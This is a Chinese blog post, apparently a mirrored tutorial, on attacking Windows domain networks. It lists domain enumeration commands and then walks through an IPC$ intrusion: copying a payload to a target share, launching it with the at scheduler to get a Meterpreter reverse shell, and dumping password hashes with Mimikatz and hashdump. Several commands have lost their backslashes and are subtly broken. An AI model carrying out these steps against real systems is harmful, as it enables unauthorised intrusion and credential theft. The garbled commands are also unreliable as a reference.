zoukankan      html  css  js  c++  java
  • 内网IPC$入侵

    一、域操作相关的命令
    1.查看域用户

    net user/domain
    2.查看有几个域

    net view/domain
    3.查看域内的主机

    net view/domain: XXX
    4.查看域里面的组

    net group/domain
    5.查看域内所有的主机名

    net group "domain computers" /domain
    6.查看域管理员

    net group "domain admins" /domain
    7.查看域控制器

    net group "domain controllers" /domain
    8.查看企业管理组

    net group "enterprise admins" /domain
    9.查看时间服务器

    nettime/domain
    二、IPC$入侵
    IPC$入侵,即通过使用Windows系统默认启动的IPC$共享获得计算机控制权的入侵,在内网中及其常见。
    假设现在有一台IPC$主机:127.0.0.25,输入以下命令。

    #连接127.0.0.25的IPC$共享:
    D:>net use 127.0.0.25ipc$
    #复制srv.exe到目标主机
    D:>copy srv.exe 127.0.0.25ipc$
    #查时间
    D:>net time127.0.0.25
    #用at命令在10点50分启动srv.exe(注意这里设置的时间比主机时间快)
    D:>at 127.0.0.25 10:50 srv.exe
    上述命令中的at就是让计算机在指定的时间做指定事情的命令(例如运行程序)

    这里把免杀的Payload上传到PAVMSEP131服务器,然后利用at命令启动Payload,反弹回Meterpreter Shell
    将木马复制到目标服务器

    查看系统时间

    使用at命令启动木马

    接着返回handler监听,可以看到反弹成功了,我们获得了PAVMSEP131服务器的Meterpreter Shell
    反弹成功

    下面看看PAVMSEP131服务器的信息和现在的权限
    查看系统信息

    可以看到有SYSTEM权限,说明既可以使用Mimikatz等工具,也可以输入 run post/windows/gather/hashdump来抓Hash
    在用Mimikatz抓Hash前要注意一点:如果服务器安装的是64位操作系统,要把Mimikatz的进程迁移到一个64位的程序进程中,才能查看64位操作系统的密码明文,在32位系统中就没有这个限制。

    这里使用Mimikatz抓Hash

    上传Mimikatz

    抓取Hash

    查看抓到的域用户的权限

  • 相关阅读:
    02 python网络爬虫《Http和Https协议》
    09 Django之orm中的锁和事务
    08 Django之自定义标签和过滤器
    07 Django之配置静态文件以及渲染图片
    06 Django之模型层---多表操作
    05 Django之模型层---单表操作
    Spring 中的 18 个注解,你会几个?
    一个 Java 对象到底有多大?
    面试题:InnoDB中一棵B+树能存多少行数据?
    Elasticsearch如何做到亿级数据查询毫秒级返回?
  • 原文地址:https://www.cnblogs.com/Fluorescence-tjy/p/11222514.html
Copyright © 2011-2022 走看看